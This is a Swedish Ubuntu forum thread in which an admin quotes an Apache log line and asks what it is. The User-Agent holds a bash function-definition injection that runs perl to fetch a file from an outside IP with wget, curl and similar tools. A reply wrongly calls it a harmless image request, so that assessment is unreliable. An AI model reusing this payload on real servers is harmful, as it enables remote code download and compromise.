Ubuntu Sverige

På flera av mina Apache2-servrar har jag följande i logfilerna

202.78.94.70 - [13/Jan/2016:22:48:36 -0800] "GET / HTTP/1.1" 200 444 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\" wget http://204.232.209.188/images/freshcafe ... 30_192.png ; curl -O http://204.232.209.188/images/freshcafe ... 30_192.png ; fetch http://204.232.209.188/images/freshcafe ... 30_192.png ; lwp-download http://204.232.209.188/images/freshcafe ... 30_192.png ; GET http://204.232.209.188/images/freshcafe ... 30_192.png ; lynx http://204.232.209.188/images/freshcafe ... 30_192.png \");'"

Sista parametern i loggen är User-Agent. Personen försöker mao skicka exekverbar kod i den. Jag har mycket svårt att se att Apache2 eller någon webserver skulle försöka exekvera user-agent-strängen som kod.

Jag har sökt på nätet efter detta men inte hittat något. Är detta någon som vet vad det är för säkerhetshål han försöker utnyttja, jag har svårt att se att det skulle fungera med Apache, men det kanske rör sig om någon random-hemma-router som har det.

Nu är det iofs ett tag sedan jag senast driftade en Apache2, men vid en hastig anblick ser det där inte ut som något direkt farligt. Det enda som står där är ju i princip att någon/något försökt hämta ("GET") en samling bilder från något som heter "Williams Fresh Cafe". Mer information om vad det är för något finns här och det verkar relativt ofarligt.

Detta är alltså så som det ser ut vid en hastig anblick och utan att jag egentligen satt mig in i det eller kollat upp dokumentationen för Apache2....

[Edit] User agent är ju egentligen den webbläsare som används och kanske är det så att om någon eller något (bot?) kommer via "Williams Fresh Cafe", så har de kanske någon egen form av webbläsare eller så. Men hur som helst så kan jag aldrig tro att en Apache2:a skulle få för sig att exekvera det som står i User agent...